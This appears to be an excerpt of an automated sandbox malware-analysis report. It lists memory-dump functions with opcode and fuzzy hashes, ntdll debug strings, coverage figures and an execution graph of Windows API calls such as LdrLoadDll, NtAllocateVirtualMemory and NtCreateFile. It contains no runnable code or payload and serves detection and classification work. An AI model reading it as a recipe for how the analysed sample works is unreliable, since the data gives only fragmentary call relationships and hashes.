                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f52b1e2a355e9c5112d3b15cddc13a6b16f90212843ce65a16fedd1746cec6ae
                                                        • Instruction ID: 807389594189881ae84ac56fdcc6e2fd08cb96bccf7d194cc0bb7da35d3bd546
                                                        • Opcode Fuzzy Hash: f52b1e2a355e9c5112d3b15cddc13a6b16f90212843ce65a16fedd1746cec6ae
                                                        • Instruction Fuzzy Hash: 8A90026134150443D10071984428F064049D7E1301F55C015E10A4554DC659CD526226
                                                        Function 01932F60 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 19f8336b6a414f115411764428045ba1c615c89c4688679d2c2780fbbd0a511a
                                                        • Instruction ID: 8b79cbbff67a4478dfcfdee1b12c64e38ed5003b1d958b5cd5b055d73868e228
                                                        • Opcode Fuzzy Hash: 19f8336b6a414f115411764428045ba1c615c89c4688679d2c2780fbbd0a511a
                                                        • Instruction Fuzzy Hash: BE90026121150043D10471984418B06408997E1201F55C012E2194554CC5698D615225
                                                        Function 01932E80 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fa3afc8a6a75174aa06008c0757144a3753e435aa5dc6184ac010d38b7d5b770
                                                        • Instruction ID: fb6d1484bff073fdc8c14f050d767964301f29b14204eeab32715f8c6d43d683
                                                        • Opcode Fuzzy Hash: fa3afc8a6a75174aa06008c0757144a3753e435aa5dc6184ac010d38b7d5b770
                                                        • Instruction Fuzzy Hash: 9890022160150503D10171984418A16404E97D0241F95C022E1064555ECA658A92A231
                                                        Function 01932EA0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fafa872da6a0ec69c7875680de71f0fc88a847b787bcd5a8d6ef0d6f60478126
                                                        • Instruction ID: 40c4973551e2c3f30ec6b9020d3def664ae0043a5e35005beda7dc5c5ffc0850
                                                        • Opcode Fuzzy Hash: fafa872da6a0ec69c7875680de71f0fc88a847b787bcd5a8d6ef0d6f60478126
                                                        • Instruction Fuzzy Hash: 1890027120150403D14071984418B46404997D0301F55C011E50A4554EC6998ED56765
                                                        Function 01932EE0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 422014d95879d726c27577c8ddcc576de706424ba5add2a48a8412532743ba99
                                                        • Instruction ID: 833b5023da46aaeb049d5c95bc8ff3fd13e0a87c0acd5da8ad86f62f45a319e0
                                                        • Opcode Fuzzy Hash: 422014d95879d726c27577c8ddcc576de706424ba5add2a48a8412532743ba99
                                                        • Instruction Fuzzy Hash: 8B90026120190403D14075984818A07404997D0302F55C011E20A4555ECA698D516235
                                                        Function 01932E30 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2be61b06e1db17752830999f81a5ee24316998a2d384a297986cf6686bb9b71e
                                                        • Instruction ID: 9ebd0d51a3da7f93d372eaca4eabaa2829a6f8f3b147778cdb5228695ca9607a
                                                        • Opcode Fuzzy Hash: 2be61b06e1db17752830999f81a5ee24316998a2d384a297986cf6686bb9b71e
                                                        • Instruction Fuzzy Hash: 9B90022130150403D10271984428A06404DD7D1345F95C012E1464555DC6658A53A232
                                                        Function 01933090 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4965832004c4b3acd091cd46ef682c72b6ea0c4ae04b2ce184ef96be474189a
                                                        • Instruction ID: e30c3542dcd32bee87b9c21a4f910cdaa9806489eefe12b623244d5a266d5712
                                                        • Opcode Fuzzy Hash: a4965832004c4b3acd091cd46ef682c72b6ea0c4ae04b2ce184ef96be474189a
                                                        • Instruction Fuzzy Hash: 2D90022124150803D14071988428B07404AD7D0601F55C011E0064554DC6568A6567B1
                                                        Function 01933010 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f11472efd6a03b2aa805a34fd98d0ebac3f316d299f57eb45fdb2889ae64bae
                                                        • Instruction ID: 0ad885fbe60450d249a784b722083b3c677a69903d4f56f4951a142712b4cb3a
                                                        • Opcode Fuzzy Hash: 1f11472efd6a03b2aa805a34fd98d0ebac3f316d299f57eb45fdb2889ae64bae
                                                        • Instruction Fuzzy Hash: 2B90022120194443D14072984818F0F814997E1202F95C019E4196554CC95589555721
                                                        Function 019339B0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22ab45aebc851fa7b17c69cd2975cae011c7fa8e312bbe15b517730175e977f2
                                                        • Instruction ID: 4063910045c7b9dc22c8eb1a63cce8d82e01e7abe9fc626a8ebc25005c15335d
                                                        • Opcode Fuzzy Hash: 22ab45aebc851fa7b17c69cd2975cae011c7fa8e312bbe15b517730175e977f2
                                                        • Instruction Fuzzy Hash: 6F90022124555103D150719C4418A168049B7E0201F55C021E0854594DC59589556321
                                                        Function 01933D10 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e83800c5f42c4e565d85b02136a8d81d1095e9ed2f6dce06af3cae9698743ade
                                                        • Instruction ID: 4feb95ab9abcec5c042039a0f704e3f5916394dacf57a726dcec1b4c1f926097
                                                        • Opcode Fuzzy Hash: e83800c5f42c4e565d85b02136a8d81d1095e9ed2f6dce06af3cae9698743ade
                                                        • Instruction Fuzzy Hash: 4B90023120250143954072985818E4E814997E1302B95D415E0055554CC95489615321
                                                        Function 01933D70 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 42a4184abbf0455e124b6540ae7ad311bcf2b278387c57048685a1fafbb783c3
                                                        • Instruction ID: cb17a2db2a29d59424af51b48f2153cdfd42c4e2fed5cf873eab89aac1c7ebc0
                                                        • Opcode Fuzzy Hash: 42a4184abbf0455e124b6540ae7ad311bcf2b278387c57048685a1fafbb783c3
                                                        • Instruction Fuzzy Hash: B390023520150403D51071985818A46408A97D0301F55D411E0464558DC69489A1A221
                                                        Function 01932C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                        • Instruction ID: 8aa1b01b2e17a63f7d4caa082236e84725fc21413dbaeefd10396891870cebf7
                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                        • Instruction Fuzzy Hash:
                                                        Function 01932890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 1c97044f21a011c13c6be97b52dfc17a48ab782382350661788bc6cfda861e67
                                                        • Instruction ID: 56f9d21edea3c034d7857505a402431d555b4c39c5bfb369770415a6f3db7a22
                                                        • Opcode Fuzzy Hash: 1c97044f21a011c13c6be97b52dfc17a48ab782382350661788bc6cfda861e67
                                                        • Instruction Fuzzy Hash: 8351D4B2A00216BFCB15DF9C899097EFBFCBB882417148269E56DD7641D334DE408BA0
                                                        Function 019A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: fb36b6e68237278db460062e46a7959eff1fc1049c41c98b39d49074be44c105
                                                        • Instruction ID: d29b82d9b6a9b4c7043b95ceeeec30bc09cfbc0b048f25c865f2fbd60acf338b
                                                        • Opcode Fuzzy Hash: fb36b6e68237278db460062e46a7959eff1fc1049c41c98b39d49074be44c105
                                                        • Instruction Fuzzy Hash: 74512771A04656AFCB30DF5DC8909BFBBFDFB44201B848869E5DEC7641E674EA0487A0
                                                        Function 01927630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019646FC
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01964787
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01964725
                                                        • ExecuteOptions, xrefs: 019646A0
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01964742
                                                        • Execute=1, xrefs: 01964713
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01964655
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        • Opcode ID: c7ac772e5dd9f812f91ef4b64018679d238850cce410158fd789332767751396
                                                        • Instruction ID: 2cfe256f594df625df18b40ee5a0574636d0c9c2e05e3e7292d5ce6db4c3278a
                                                        • Opcode Fuzzy Hash: c7ac772e5dd9f812f91ef4b64018679d238850cce410158fd789332767751396
                                                        • Instruction Fuzzy Hash: 36512A3160022A6AEF25EBE8DC89FA977ACAF64305F040499D60DF7181D7719E45CF51
                                                        Function 019C6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                        • Instruction ID: 971d80ac793af185925caa1c15364dbf6792b329aedd1b7cc9a3b685bdf37849
                                                        • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                        • Instruction Fuzzy Hash: 70020671508342AFD305CF68C890A6BBBE5EFD8B14F04892DFA894B364DB31E945CB52
                                                        Function 0193B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-$0$0
                                                        • API String ID: 1302938615-699404926
                                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                        • Instruction ID: d2ec2b64b8fe01b76de70f8929ba14f97eec7ae8d95965f60fb2ee2d0eb3ed43
                                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                        • Instruction Fuzzy Hash: E981E470E052499EEF26CE6CC8517FEBBB5EFC4321F18451AD85BA7692C7308840C752
                                                        Function 019A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$[$]:%u
                                                        • API String ID: 48624451-2819853543
                                                        • Opcode ID: 297a75b3456ebf1c2d8ba8b024db4ab6aac417ea5535996cbae4627576153fa9
                                                        • Instruction ID: 2ebadefb15d388b45d79e327e9083d3707e89077c780d105b8b9f1b695743458
                                                        • Opcode Fuzzy Hash: 297a75b3456ebf1c2d8ba8b024db4ab6aac417ea5535996cbae4627576153fa9
                                                        • Instruction Fuzzy Hash: CF21337AE00119ABDB11DF69DC44EEE7BEDAF94654F450126EA09D3200E734EA058BE1
                                                        Function 0191F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 0196031E
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019602BD
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019602E7
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                        • API String ID: 0-2474120054
                                                        • Opcode ID: 71aa963d6cdba08394712580502999e368ed135e3d76e471129f0e72e7a85391
                                                        • Instruction ID: 1baccf0e6f5caea1bf3414f4afa827e0d2d7604795d7e6cfee3af352a514d73e
                                                        • Opcode Fuzzy Hash: 71aa963d6cdba08394712580502999e368ed135e3d76e471129f0e72e7a85391
                                                        • Instruction Fuzzy Hash: C9E1AF706087499FD725CF28C884B2ABBE8BF84314F180A5DF5A9CB2D1D774D989CB52
                                                        Function 0192BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 01967BAC
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01967B7F
                                                        • RTL: Resource at %p, xrefs: 01967B8E
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 0-871070163
                                                        • Opcode ID: 0ca9f043323f8c9a163d801c1b5e3cfc0d96b277e075f31c1123fe89ee09f437
                                                        • Instruction ID: ef1f4235b5aa683c2c172cff1c3614842c88d5cdce6a0006619b573c2564da85
                                                        • Opcode Fuzzy Hash: 0ca9f043323f8c9a163d801c1b5e3cfc0d96b277e075f31c1123fe89ee09f437
                                                        • Instruction Fuzzy Hash: BB41D2317047029FD725DE29C840F6AB7E9EF98721F100A1DEA5EEB680DB71E9058B91
                                                        Function 0192B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0196728C
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 019672C1
                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01967294
                                                        • RTL: Resource at %p, xrefs: 019672A3
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-605551621
                                                        • Opcode ID: a0f13d3d0ef82c2d56078f8d25529e08cff05a1334cbfb5a7b992957cd5ea211
                                                        • Instruction ID: 5df55b61bedb01a42420b29945cd4ead678c3c21e1d7f40e9090075670ed2407
                                                        • Opcode Fuzzy Hash: a0f13d3d0ef82c2d56078f8d25529e08cff05a1334cbfb5a7b992957cd5ea211
                                                        • Instruction Fuzzy Hash: 7041C131700216ABD725DE69CC81F66B7E9FF94715F100A19F959EB240DB21F8428BE1
                                                        Function 019A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: d8fd9a7680dc8fc6d07ba1fe1da58c88cb1d8794f5c490d46d0830c98930e248
                                                        • Instruction ID: fd2af9b9e56762587161c2920c6a8b6c863220da6b740d61e1fa6ed4b09e0d66
                                                        • Opcode Fuzzy Hash: d8fd9a7680dc8fc6d07ba1fe1da58c88cb1d8794f5c490d46d0830c98930e248
                                                        • Instruction Fuzzy Hash: 58315472A002299FDB20DF29DC40BEE77FCEF55611F844555E94DE7240EF309A488BA0
                                                        Function 01937D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-
                                                        • API String ID: 1302938615-2137968064
                                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                        • Instruction ID: 28392ffccbc599d78b83cd88e57c230de1b6047940d925aa69245b12e023ad09
                                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                        • Instruction Fuzzy Hash: BF9178B1E002169BDB28DF9DC881ABEBBA9FFC4721F14461AE95DE72D0D73099408761
                                                        Function 018F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$@
                                                        • API String ID: 0-1194432280
                                                        • Opcode ID: ef8af53c856a4cc207efaf20b7c7c13acc8e9b8f67972d14fbaff48e4828f018
                                                        • Instruction ID: c5028a9f2496064fde01f9513adadee762b367000d1e97e88bee750f6d2e10af
                                                        • Opcode Fuzzy Hash: ef8af53c856a4cc207efaf20b7c7c13acc8e9b8f67972d14fbaff48e4828f018
                                                        • Instruction Fuzzy Hash: 4D810971D01269DBDB35CB54CC44BEABBB8AB48714F0041EAEA1DB7280D7709E85CFA0

                                                        Execution Graph

                                                        Execution Coverage:2.5%
                                                        Dynamic/Decrypted Code Coverage:4.3%
                                                        Signature Coverage:1.6%
                                                        Total number of Nodes:446
                                                        Total number of Limit Nodes:72
                                                        execution_graph 97043 2d42ad0 LdrInitializeThunk 97044 3a82fe 97045 3a82c2 97044->97045 97046 3a832b 97045->97046 97048 3a6d20 LdrInitializeThunk LdrInitializeThunk 97045->97048 97048->97045 97049 3a5870 97050 3a5886 97049->97050 97055 3b77c0 97050->97055 97054 3a58bb 97056 3b77dd 97055->97056 97064 2d42c0a 97056->97064 97057 3a58a6 97059 3b81f0 97057->97059 97060 3b8277 97059->97060 97062 3b8217 97059->97062 97067 2d42e80 LdrInitializeThunk 97060->97067 97061 3b82a8 97061->97054 97062->97054 97065 2d42c11 97064->97065 97066 2d42c1f LdrInitializeThunk 97064->97066 97065->97057 97066->97057 97067->97061 97073 399672 97075 399a97 97073->97075 97076 399ee2 97075->97076 97077 3b9cc0 97075->97077 97078 3b9ce6 97077->97078 97083 393f90 97078->97083 97080 3b9cf2 97081 3b9d20 97080->97081 97086 3b4760 97080->97086 97081->97076 97090 3a3260 97083->97090 97085 393f9d 97085->97080 97087 3b47ba 97086->97087 97089 3b47c7 97087->97089 97107 3a1700 97087->97107 97089->97081 97091 3a3277 97090->97091 97093 3a3290 97091->97093 97094 3b8b90 97091->97094 97093->97085 97096 3b8ba8 97094->97096 97095 3b8bcc 97095->97093 97096->97095 97097 3b77c0 LdrInitializeThunk 97096->97097 97098 3b8c21 97097->97098 97101 3ba030 97098->97101 97104 3b84c0 97101->97104 97103 3b8c3a 97103->97093 97105 3b84da 97104->97105 97106 3b84eb RtlFreeHeap 97105->97106 97106->97103 97108 3a173b 97107->97108 97123 3a79b0 97108->97123 97110 3a1743 97111 3a1a12 97110->97111 97134 3ba110 97110->97134 97111->97089 97113 3a1759 97114 3ba110 RtlAllocateHeap 97113->97114 97115 3a176a 97114->97115 97116 3ba110 RtlAllocateHeap 97115->97116 97118 3a177b 97116->97118 97122 3a180e 97118->97122 97148 3a67b0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 97118->97148 97120 3a19cf 97144 3b6e80 97120->97144 97137 3a4530 97122->97137 97124 3a79dc 97123->97124 97149 3a78a0 97124->97149 97127 3a7a09 97129 3a7a14 97127->97129 97155 3b8160 97127->97155 97128 3a7a21 97130 3a7a3d 97128->97130 97132 3b8160 NtClose 97128->97132 97129->97110 97130->97110 97133 3a7a33 97132->97133 97133->97110 97163 3b8470 97134->97163 97136 3ba12b 97136->97113 97139 3a454c 97137->97139 97138 3a455b 97138->97120 97139->97138 97141 3a457a 97139->97141 97166 3bb4f0 LdrLoadDll 97139->97166 97142 3a45a7 97141->97142 97143 3a4596 LdrLoadDll 97141->97143 97142->97120 97143->97142 97145 3b6eda 97144->97145 97146 3b6ee7 97145->97146 97167 3a1a30 97145->97167 97146->97111 97148->97122 97150 3a7996 97149->97150 97151 3a78ba 97149->97151 97150->97127 97150->97128 97158 3b7860 97151->97158 97154 3b8160 NtClose 97154->97150 97156 3b817d 97155->97156 97157 3b818e NtClose 97156->97157 97157->97129 97159 3b787d 97158->97159 97162 2d435c0 LdrInitializeThunk 97159->97162 97160 3a798a 97160->97154 97162->97160 97164 3b848a 97163->97164 97165 3b849b RtlAllocateHeap 97164->97165 97165->97136 97166->97141 97183 3a7c80 97167->97183 97169 3a1f25 97169->97146 97170 3a1a50 97170->97169 97187 3b08e0 97170->97187 97173 3a1c51 97195 3bb240 97173->97195 97175 3a1aae 97175->97169 97190 3bb110 97175->97190 97177 3a1c8b 97177->97169 97181 3a06c0 LdrInitializeThunk 97177->97181 97205 3a7c20 97177->97205 97178 3a1c66 97178->97177 97201 3a06c0 97178->97201 97180 3a7c20 LdrInitializeThunk 97182 3a1db9 97180->97182 97181->97177 97182->97177 97182->97180 97184 3a7c8d 97183->97184 97185 3a7cae SetErrorMode 97184->97185 97186 3a7cb5 97184->97186 97185->97186 97186->97170 97209 3b9fa0 97187->97209 97189 3b0901 97189->97175 97191 3bb120 97190->97191 97192 3bb126 97190->97192 97191->97173 97193 3ba110 RtlAllocateHeap 97192->97193 97194 3bb14c 97193->97194 97194->97173 97196 3bb1b0 97195->97196 97197 3ba110 RtlAllocateHeap 97196->97197 97198 3bb20d 97196->97198 97199 3bb1ea 97197->97199 97198->97178 97200 3ba030 RtlFreeHeap 97199->97200 97200->97198 97202 3a06dd 97201->97202 97216 3b83d0 97202->97216 97206 3a7c33 97205->97206 97221 3b76d0 97206->97221 97208 3a7c5e 97208->97177 97212 3b82b0 97209->97212 97211 3b9fd1 97211->97189 97213 3b833a 97212->97213 97215 3b82d4 97212->97215 97214 3b8350 NtAllocateVirtualMemory 97213->97214 97214->97211 97215->97211 97217 3b83ea 97216->97217 97220 2d42c70 LdrInitializeThunk 97217->97220 97218 3a06e2 97218->97182 97220->97218 97222 3b7743 97221->97222 97223 3b76f4 97221->97223 97226 2d42dd0 LdrInitializeThunk 97222->97226 97223->97208 97224 3b7768 97224->97208 97226->97224 97227 3b7e70 97228 3b7f1f 97227->97228 97230 3b7e9b 97227->97230 97229 3b7f35 NtCreateFile 97228->97229 97231 3b12b0 97235 3b12bf 